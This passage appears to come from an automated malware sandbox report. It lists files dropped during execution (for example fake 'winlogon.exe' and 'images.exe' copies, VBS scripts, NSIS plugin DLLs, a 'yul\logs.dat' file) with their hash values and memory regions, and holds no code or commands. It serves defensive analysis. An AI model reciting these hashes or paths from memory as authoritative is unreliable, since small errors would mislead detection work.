SHA512 85a0b87a248ab50e678b49e622eb1311e2df2fae4a99dea318edde735bcff17e5724dbc71341c70aa62766e1f5f1e8f139ff583f84bf7d3ff5f6bd85002fa264

memory/2944-564-0x00000000064D0000-0x0000000006594000-memory.dmp

memory/2944-567-0x00000000064D0000-0x0000000006594000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aug.vbs

MD5 2725abf432ceeca35be3ac737c3f0847
SHA1 608ac3ed1248b3c35deec3ee55070d52b2c9d1a0
SHA256 6eaa55f7bd4117835ac0116d85b20fdcc35e1c461379dbac106d2c2c51d60516
SHA512 a014a6c2a10f9efe9ca85f4da5505fb2eb6071342b7f4dce0b48446d4462ba26fc1e44a1ba9833d6ab623d2d75c0643c488e46d1995fb20bfd0ed8d8f517b0e2

memory/2944-590-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/2944-606-0x00000000050A0000-0x00000000050B0000-memory.dmp

C:\Users\Admin\AppData\Local\Tempwinlogon.exe

MD5 20390c8434f741d1abee9c8d48248bdb
SHA1 10577df5ed0ecba6a3da8552d112bd5e00e793d2
SHA256 ab87db3a4dc092240719fe8d9f0192b15dbeaa25ee21ef6607ef5e2cb6f775e3
SHA512 e1cd502740eb8bc267c7ca61c1781225f598b17948b0c6f99d8495efb27181a34075b7b5a89b775e1b9ac7cccfb5f2cc32fb61dbdf8cda9ac795349745bdd98b

C:\Users\Admin\AppData\Local\Tempwinlogon.exe

MD5 20390c8434f741d1abee9c8d48248bdb
SHA1 10577df5ed0ecba6a3da8552d112bd5e00e793d2
SHA256 ab87db3a4dc092240719fe8d9f0192b15dbeaa25ee21ef6607ef5e2cb6f775e3
SHA512 e1cd502740eb8bc267c7ca61c1781225f598b17948b0c6f99d8495efb27181a34075b7b5a89b775e1b9ac7cccfb5f2cc32fb61dbdf8cda9ac795349745bdd98b

C:\Users\Admin\AppData\Local\Tempwinlogon.exe

MD5 20390c8434f741d1abee9c8d48248bdb
SHA1 10577df5ed0ecba6a3da8552d112bd5e00e793d2
SHA256 ab87db3a4dc092240719fe8d9f0192b15dbeaa25ee21ef6607ef5e2cb6f775e3
SHA512 e1cd502740eb8bc267c7ca61c1781225f598b17948b0c6f99d8495efb27181a34075b7b5a89b775e1b9ac7cccfb5f2cc32fb61dbdf8cda9ac795349745bdd98b

C:\ProgramData\images.exe

MD5 20390c8434f741d1abee9c8d48248bdb
SHA1 10577df5ed0ecba6a3da8552d112bd5e00e793d2
SHA256 ab87db3a4dc092240719fe8d9f0192b15dbeaa25ee21ef6607ef5e2cb6f775e3
SHA512 e1cd502740eb8bc267c7ca61c1781225f598b17948b0c6f99d8495efb27181a34075b7b5a89b775e1b9ac7cccfb5f2cc32fb61dbdf8cda9ac795349745bdd98b

C:\ProgramData\images.exe

MD5 20390c8434f741d1abee9c8d48248bdb
SHA1 10577df5ed0ecba6a3da8552d112bd5e00e793d2
SHA256 ab87db3a4dc092240719fe8d9f0192b15dbeaa25ee21ef6607ef5e2cb6f775e3
SHA512 e1cd502740eb8bc267c7ca61c1781225f598b17948b0c6f99d8495efb27181a34075b7b5a89b775e1b9ac7cccfb5f2cc32fb61dbdf8cda9ac795349745bdd98b

memory/2672-675-0x0000000074580000-0x0000000074D30000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe

MD5 eeaf1ba6942af442482e1ebcad0e1673
SHA1 31aa06cdf56d2f7bd3415d6368a65a0fa754ee1d
SHA256 45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b
SHA512 c8fd363537c3768dab29693b8b813a09edef0feb0708161bfbe707c4dd3a0241f99dadcbcc8f5c803c0c87e7e7a84748b3253d3ffec44bfacf365ea818660474

C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe

MD5 eeaf1ba6942af442482e1ebcad0e1673
SHA1 31aa06cdf56d2f7bd3415d6368a65a0fa754ee1d
SHA256 45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b
SHA512 c8fd363537c3768dab29693b8b813a09edef0feb0708161bfbe707c4dd3a0241f99dadcbcc8f5c803c0c87e7e7a84748b3253d3ffec44bfacf365ea818660474

memory/2672-685-0x0000000004FC0000-0x0000000004FD0000-memory.dmp

memory/3516-688-0x00000000000F0000-0x0000000000182000-memory.dmp

memory/3516-690-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/1356-727-0x0000000074580000-0x0000000074D30000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe

MD5 a1c3527c92c39a84c541ef4accd19c8c
SHA1 fbf0a9ceb197c7f3f49209440660cc921b437d0f
SHA256 23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed
SHA512 8e7d351ab587bb3dd426704031b047f0c8c2469a809b819e437ea297854a2a6b91908386af9c6cd2efb32480f7d2d95cebbf290afa3855a05918db03f13ed0c6

C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe

MD5 a1c3527c92c39a84c541ef4accd19c8c
SHA1 fbf0a9ceb197c7f3f49209440660cc921b437d0f
SHA256 23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed
SHA512 8e7d351ab587bb3dd426704031b047f0c8c2469a809b819e437ea297854a2a6b91908386af9c6cd2efb32480f7d2d95cebbf290afa3855a05918db03f13ed0c6

C:\Users\Admin\AppData\Local\Temp\nsl9D71.tmp\nosub.dll

MD5 c0c6c2911a86799e5511e6c99169f7fa
SHA1 488bc8e69e060d6d6dc8bc450136eb9c21d0e7ff
SHA256 54cb41bcb5730f5941a0214106ac09f70479a97e30f4dba1cb50022d1216e3fb
SHA512 7b0ad6e7ad0ede4138d1ddde4fb6d2fa2abe15e14610c61f14fcd5ef613c765640e2c984dfd9fd074c309f77581c822bc3c2b281c59a0b6d97d3564ab477df9d

C:\Users\Admin\AppData\Local\Temp\nsl9D71.tmp\nosub.dll

MD5 c0c6c2911a86799e5511e6c99169f7fa
SHA1 488bc8e69e060d6d6dc8bc450136eb9c21d0e7ff
SHA256 54cb41bcb5730f5941a0214106ac09f70479a97e30f4dba1cb50022d1216e3fb
SHA512 7b0ad6e7ad0ede4138d1ddde4fb6d2fa2abe15e14610c61f14fcd5ef613c765640e2c984dfd9fd074c309f77581c822bc3c2b281c59a0b6d97d3564ab477df9d

memory/1356-819-0x0000000005A10000-0x0000000005A20000-memory.dmp

memory/3028-821-0x0000000000BD0000-0x0000000000BD2000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe

MD5 a1c3527c92c39a84c541ef4accd19c8c
SHA1 fbf0a9ceb197c7f3f49209440660cc921b437d0f
SHA256 23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed
SHA512 8e7d351ab587bb3dd426704031b047f0c8c2469a809b819e437ea297854a2a6b91908386af9c6cd2efb32480f7d2d95cebbf290afa3855a05918db03f13ed0c6

memory/2772-838-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/1520-840-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1520-856-0x00000000009B0000-0x0000000000CFA000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe

MD5 cc1813159fd550c85aae1423853f3307
SHA1 020f12dd4aa5a90971c350f447cb55a3640052ea
SHA256 84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8
SHA512 95dfde562904136a3c8e2bbe69ea62bea7d5aa4659c186b16faec46af395298c38aa29995e6f0101031f633b89ec381da8179530d9858d391ecc3785e6438187

C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe

MD5 cc1813159fd550c85aae1423853f3307
SHA1 020f12dd4aa5a90971c350f447cb55a3640052ea
SHA256 84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8
SHA512 95dfde562904136a3c8e2bbe69ea62bea7d5aa4659c186b16faec46af395298c38aa29995e6f0101031f633b89ec381da8179530d9858d391ecc3785e6438187

memory/468-871-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/468-869-0x0000000000F30000-0x0000000000FF8000-memory.dmp

C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe

MD5 92b8b8d35ba16bf772e1c3c55972ccda
SHA1 4cb1fcef30fdcfe0f590ba1f223787939257ba36
SHA256 82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f
SHA512 fed3b35b7f131fc80ca8d21f697ea0e91f3b9ed04eb36087b5d652a3396ce46e649dd6f401839ca0235a1c7bcd7e777c7cf27898ae00fe3dfe1712f0064b6be6

C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe

MD5 92b8b8d35ba16bf772e1c3c55972ccda
SHA1 4cb1fcef30fdcfe0f590ba1f223787939257ba36
SHA256 82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f
SHA512 fed3b35b7f131fc80ca8d21f697ea0e91f3b9ed04eb36087b5d652a3396ce46e649dd6f401839ca0235a1c7bcd7e777c7cf27898ae00fe3dfe1712f0064b6be6

C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe

MD5 28f7bcef2f0ad733d84f05d4e1f11e36
SHA1 d90e4f9ccb44cf67a97f42307425836087381420
SHA256 76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc
SHA512 b4cbcb01d58743089089ddd5f5f620bd3766d899a4846109aa65028fe4736875e558e1f484c679691118cb15cf0cb4a582860c6472125128b49c62da892997d3

C:\Users\Admin\AppData\Local\Temp\nswAC83.tmp\System.dll

MD5 9625d5b1754bc4ff29281d415d27a0fd
SHA1 80e85afc5cccd4c0a3775edbb90595a1a59f5ce0
SHA256 c2f405d7402f815d0c3fadd9a50f0bbbb1bab9aa38fe347823478a2587299448
SHA512 dce52b640897c2e8dbfd0a1472d5377fa91fb9cf1aeff62604d014bccbe5b56af1378f173132abeb0edd18c225b9f8f5e3d3e72434aed946661e036c779f165b

C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe

MD5 94d7d5f70d6d2ffdafb1bc5971357591
SHA1 8a653ed7d552faaf82bf5a6c554e7d6ef3c79937
SHA256 a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5
SHA512 f655c869d24a23954755a8f132f57ffc16ad7f1aeeb0836111e8f09d6664f77746e2de4414b72a2d61b04856ad599c45d3a522a10cf8bcd0ae59f0378bf0b842

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\10194C65-FC8E-413C-AF23-8732E6E6A1CA

MD5 0b1f5b87f25cc675c67d233481e9ba9c
SHA1 a4582194b1bdc905019fe18c6bf34acc95261507
SHA256 1e7f0a806164ba62fcd57198b9a55bea975f7c79a71443a032e79338434378dc
SHA512 7503640d5e963e5630d1dae7fa713b5cad463e3ab4577c9d5410397d5fcf04fce677ad97fded19725a2fd607d39a912bb23aae18c414bc200a71e85635d8c597

C:\Users\Admin\Desktop\2023-08-17-18\940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71.rtf

MD5 ce556b371242f7d1636bb0d7603b98a0
SHA1 641b283d0c914c77ea6b05d75efd562f932a3dc0
SHA256 940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71
SHA512 81ec3104db754b36cb0df7ae87182796e1e4d251600b81f992138cf87fc5b2883701519a833af89eb6f4bf1cabc3d8f2564f15aaff14ee85b5e7aa056a3e2dcb

C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe

MD5 a90c6e3eaed8cc4c94f550c1c7b529b0
SHA1 3cd72d872546c17d2274da18ab00b3db75442621
SHA256 fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a
SHA512 0b109e9215e4f8463913e4285b05517c67ec5d311aa7dafd8564a16b29c63cfb03be529c6e36e9b4967af126b74995a31dcb57885384a931aa327d943b360315

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 099603e393aa3ab3a05910003fe05d03
SHA1 6561f88e70436583d3e08378e926791bfb6169dc
SHA256 156aa11795154557a3e2482316a6692466af7927f2a9c6c0d28dcda78e0f152c
SHA512 87ad10d22c371a5cddc3c0b80c150dfa6ac0459908aaed0405d4e9132dc9bb1e85fbb749d73737eebe8c3ea53cf471dcbc0e2b3e58b4933908e7c88db9fb4b1e

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe

MD5 a9a44220f7819f03d7b8474033b169ee
SHA1 0f0bf5382702736838907fd65e5dd7e50616f305
SHA256 1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa
SHA512 255bc358ad925873d382461ad5000f9f55d96c10751a5c682882cee61e363dbbbba2eb405c91ab3ae12df343e84ce9bf04f0e866846317e5ac5288e9d9eb549b

C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe

MD5 9a84688aca96d89b149e213f6d059bfb
SHA1 043c929249d1dcbdddf4cfd278be4425f25bb644
SHA256 f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52
SHA512 c623def7e6276f72993e52c0ad603dbaaabbe85c4856c09c4a03f7180d333f16f5c159722c511e8ae8ccdc9a5d65d1d553b8686f13fdb9f336aaf41b39ef84b5

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

MD5 9727b1893f4a4adc3107a50a77813c8e
SHA1 93f76aa52461deeeb49672f7dd497cef15470186
SHA256 a5faca4539374a78a69ef31163e96a358c49014fb3e1fa413f4463b008499d51
SHA512 acf7309e548ba621e94c32b9062149670012bea2eaf280b97359f2ece6d61e7d60eabeb295c7690b42ed3c52982b317d96aa6205cb58fa44dcd553d8468751d5

C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe

MD5 cd88bacf312e7e4b45258af81ce8048b
SHA1 f18cc032c483b6d94b856f7150e25f41509e59b6
SHA256 f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079
SHA512 cdc7007c2589ccc19cbbe286c8c0d5077d7118a2f7cb34bf735aff29f7e1b890bcf677ba1ef82b112ed2333a0108541a95b1c4461d8ea42fa2672b7bc7adcdd7

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.CampaignStates.json

MD5 75a71302083de37606971fb174fc2451
SHA1 f274276bd76eee51a5fa5a1a6b233cfcf768ffcd
SHA256 fb64ee8bc1611a0ee95c475c149e603e5751758e0847bad24cc5fd0fce2198c4
SHA512 1554270d82402f0c3073d89765abb89d0d881d517e0861019c2d44a0af8cd72e7b7a3225d8cb6b4b207a77db6a0a1f335e042280fb0ef4fcb46656849ccb4984

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyHistoryStats.json

MD5 6ca4960355e4951c72aa5f6364e459d5
SHA1 2fd90b4ec32804dff7a41b6e63c8b0a40b592113
SHA256 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3
SHA512 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.GovernedChannelStates.json

MD5 c56ff60fbd601e84edd5a0ff1010d584
SHA1 342abb130dabeacde1d8ced806d67a3aef00a749
SHA256 200e8cc8dd12e22c9720be73092eafb620435d4569dbdcdba9404ace2aa4343c
SHA512 acd2054fddb33b55b58b870edd4eb6a3cdd3131dfe6139cb3d27054ac2b2a460694c9be9c2a1da0f85606e95e7f393cf16868b6c654e78a664799bc3418da86e

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyEventActivityStats.json

MD5 6ca4960355e4951c72aa5f6364e459d5
SHA1 2fd90b4ec32804dff7a41b6e63c8b0a40b592113
SHA256 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3
SHA512 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

C:\Users\Admin\Desktop\2023-08-17-18\f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b.xlsx

MD5 5146f60c44f767730037618fc96a4587
SHA1 e6812cb8cf3b1a9a8ac5cf66e36ef3b0938ca1c2
SHA256 f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b
SHA512 feec9090d3c4c411d907a115aa72e1bddccb40acddfe6eaf80c8279d4e329c92bfee42b75746bf67ad467f3c5c23f878c1fbb83dc4afe731ae3ef2562fbd9c65

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.Settings.json

MD5 e4e83f8123e9740b8aa3c3dfa77c1c04
SHA1 5281eae96efde7b0e16a1d977f005f0d3bd7aad0
SHA256 6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31
SHA512 bd6b33fd2bbce4a46991bc0d877695d16f7e60b1959a0defc79b627e569e5c6cac7b4ad4e3e1d8389a08584602a51cf84d44cf247f03beb95f7d307fbba12bb9

C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs

MD5 18a4d7b53fe2eaaf191336f70c40e7b9
SHA1 03f92cdcfb008c2799b54fc9ac9971e8773fe771
SHA256 e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120
SHA512 7da74a078d676298502984bafd0752932eacd25ca4b3312aad81254d62eaad991987503f5ea7db5ee82a3b746793213042ba2c158b269026b56bcf5d55b22ded

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 10b7e885e2eb15906dc87aa0792e105c
SHA1 10e3d27a6b0ab5cf61dad6cd36aa061674949ac4
SHA256 feb035cc54e20ef6e16d443740b4b2c486f6f0d1711df7dba1987f968201e3a2
SHA512 e538fc83d1404ad0acc372427baa0ad9eddf55c379454985304eb8df325cb97ff60196da47d4b072fd1b5337cf08bd8cc6b63341c375a3406db10be066a9a261

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 dd45f09d7950df50662233c432e7a67b
SHA1 a9a08ab552a9acc5947ac538e1c16606df717791
SHA256 ddee979f85e87f7a075484eab34db857bf60354180be48963549591335eefd9e
SHA512 e11510e94da5af2c8b82e82dc359526f1278de4127e99922de956bc501e0248915f7dafe85263d9c81695c5fdab7f4be5ea8d13cabdbdb097f8e79895d52425b

C:\Users\Admin\AppData\Local\Temp\nsi164A.tmp\klpaz.dll

MD5 0c7637f6f292ff21c50d3ab536882144
SHA1 cd913b8ece6f2577eb07bdca61a7346184eb4962
SHA256 69b6449b7cc5e34ae8f070d9ca882995248fdf80b583660fcc5a4916d78b1be2
SHA512 7919a18357e7a11d0624f6fa8dba9e119119ea28b9843b7ebd32a65f82c2bc990abfae00c778457b7f51e0310c912c0554fe64093093fba90352b9b13b511496

C:\Users\Admin\AppData\Local\Temp\nsb1D5F.tmp\mydrvjhyy.dll

MD5 71dd0c9a7ffabfca62ae8820cae0edab
SHA1 efa543dcb10eab21decf8e5c5a71f73a6790e33f
SHA256 b890a728b5ea08fa79b5ab93cfa556ab5100e1da04bd7211fc218a611d5eeb4b
SHA512 c5ff0b3ccf641cd6126a6e1a929d3e6fb927a20319daf5192e26bab75f8ebc5b989d85688f0bc624f20d9b0210a9975308f2fe0cc0d53c8570409ff1bf80f375

C:\Users\Admin\AppData\Roaming\uiVprBevwjFGG.exe

MD5 cc1813159fd550c85aae1423853f3307
SHA1 020f12dd4aa5a90971c350f447cb55a3640052ea
SHA256 84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8
SHA512 95dfde562904136a3c8e2bbe69ea62bea7d5aa4659c186b16faec46af395298c38aa29995e6f0101031f633b89ec381da8179530d9858d391ecc3785e6438187

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GVVED0TI\json[1].json

MD5 149c2823b7eadbfb0a82388a2ab9494f
SHA1 415fe979ce5fd0064d2557a48745a3ed1a3fbf9c
SHA256 06fa5d4e7fbfb1efdc19baa034601a894b21cf729785732853ced4bb40aca869
SHA512 f8fb6b7c93c4ab37f6e250ba8ac5c82f6e17fe52156cab81d34e91107d1da716b744bfe02ee0306497a3876d5352af789a1e66dab10e11e22065bac3050475fe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2dckap5v.t3p.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe.log

MD5 8ec831f3e3a3f77e4a7b9cd32b48384c
SHA1 d83f09fd87c5bd86e045873c231c14836e76a05c
SHA256 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA512 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

C:\Users\Admin\AppData\Roaming\szBUFHBkBccpfd.exe

MD5 94d7d5f70d6d2ffdafb1bc5971357591
SHA1 8a653ed7d552faaf82bf5a6c554e7d6ef3c79937
SHA256 a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5
SHA512 f655c869d24a23954755a8f132f57ffc16ad7f1aeeb0836111e8f09d6664f77746e2de4414b72a2d61b04856ad599c45d3a522a10cf8bcd0ae59f0378bf0b842

C:\ProgramData\yul\logs.dat

MD5 a1b6bd2a98f951e5c37e51937f98fa6b
SHA1 0579fcfef9fd54ee63182e5e6394854c90a3be22
SHA256 e70c85cdd2c9d7a208542a65c3143530747e785adeb5b3ff892c164224392b63
SHA512 e641e8b9046b85bb2400c8883c468fcd30b83e3dc5b1219472fd248c6d951d7ef86dc69a63bf120acfe872220411955a6c0d66495a18100402b4f20d3ea704cc

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.json

MD5 6ca4960355e4951c72aa5f6364e459d5
SHA1 2fd90b4ec32804dff7a41b6e63c8b0a40b592113
SHA256 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3
SHA512 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

C:\ProgramData\yul\logs.dat

MD5 b0b45f6d418596b2ab5f132e05cfb376
SHA1 961ef514cdd54d6bc110d15f52598738924d4a2a
SHA256 bfd89af438a4d3217fab60f0968b2e48a907149bde21791e3dc291de912e99dc
SHA512 1e5e3e9ca6aab7c2e8e893fd9477e8dadc254b29eb6c3ebbc604a30d2e2cabc655785b52336435fe33349fbd23957295f417ecde2d428740404ac50685a3ca3b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 b950ebe404eda736e529f1b0a975e8db
SHA1 4d2c020f1aa70e2bcb666a2dd144d1f3588430b8
SHA256 bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4
SHA512 6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9b62544d156bc6b7302664fd5362b679
SHA1 360c1a42f2f7d7eba5416b84c505ae4c175bd71a
SHA256 c0a28e342325c08a2a230b552a945d943acd8f964e2c5c9a0cd6994236ca361d
SHA512 18c34d1aca9339473649948edae27ec65003b7f57a5c5e3aef6af642be4066542a0344702317362da5cd08346db5b37ce7625f1de14dfe35562293f8ccae3bd9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bd5bee5b228c95f791498ec97b68bedd
SHA1 40f2ba525e44b2c255c86ce70bdba39f5055441f
SHA256 5aea469b4ca99d337284f85a8460338daa883c28a0b5a8a6ea1f67cd11ee0170
SHA512 a131d6512ec145c7ec3a5a742af5c4195f142c7b8b937c0953056f7c79f3e7ae136fbd12db4a73e0b1b2a30c0a42e682a541646d15ae2b3e40d11196f3f3fca3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e329cc2ec5712aaec3a3fde3b7a622e9
SHA1 b7df68579017ea07eafa90db5192df1de29758e4
SHA256 fbbc440416fea58389ccf4e14bfe665223dbb17c744f4d0c56e49eef751cbb5d
SHA512 945a7a769e52846d4c06cff3064479f742c2a1d329e5f046c8cb59e83f5fa135818cbb131c01868da1e29dc670115009ac7fe443045c7f47530c1fce73bb85f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 ca36933e6dea7aa507a272121b34fdbb
SHA1 3b4741ca0308b345de5ecf6c3565b1dbacb0fb86
SHA256 fd14449eb781c58e6e7196a384caf25cba0c59ebdba3b10f8ca0ecfd0c076b5d
SHA512 5a9b186ecf085765caee97a2910008dda926ce412001042e165184083a52fb5fb70f05ca781cd2f7740ecbd938895c77c5aa0f9eb8d812b92f412f336212720e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\54f09ac1-8b24-4a8f-96d4-6acc4f9702d1.dmp

MD5 796c1a70e6f7776a60909fedc56f3a06
SHA1 ef86a3a85da5d1f9063af289f3e1b35580066544
SHA256 c7e7bcaead2c9a6ae058aa18a6575a6b6ea8ca74ba567a543d94819d7dab0b91
SHA512 9c73f1ad9e60320cd9d85b5a0604b9024be32894065c015fb5b8c438e8a49a185eb48bbd3904aaa5c89325b3cc1709ed670425b08290ea3d4384c34bea9d7a02

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 68fa59d779f4eb04d362576c6fb94e2c
SHA1 d5a109ae8016acfd7bb3d65bbc341e4a49124440
SHA256 e9c61db580d4b5eafb3681cab191093f5f79658f177194b69adfb494be93f9e9
SHA512 0169107e26c1c98babd0b4b183f4c6f19963ad49746581bd17dc0da2da49c9799bfbd07330452c04c5ff13755e01a2abf22e6616441732db5ea777f2d19bdd36

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\2ef51b0b-cfd8-4053-8a0b-4a347e633aea.dmp

MD5 5fd2eecf02dcf3ddf8aee535c7a1db6a
SHA1 f33a8ae0d5d702a9d514d6c94e6dab44c1e40fbc
SHA256 a0513f0d95a3ac31ee323e6ebc86be968c80ccc422809b6c5b6c2e1f215111ed
SHA512 eb3e0087a78f99f56afb9ef9a2c63f30f2e0e95024454f0d9f44fba10926503953c1520ae1683675551b4adad1d30b2ad1c1fc5ebd1bc373ad8590cc60151d64

C:\ProgramData\yul\logs.dat

MD5 2836bcba3c461e607845ae3518136579
SHA1 54d2d37cf9065da0f09b69836f6c975f396ec54e
SHA256 2b719d741defad231508d3130894c3d4ec86c2ed9deed630f60ffdab958d03b8
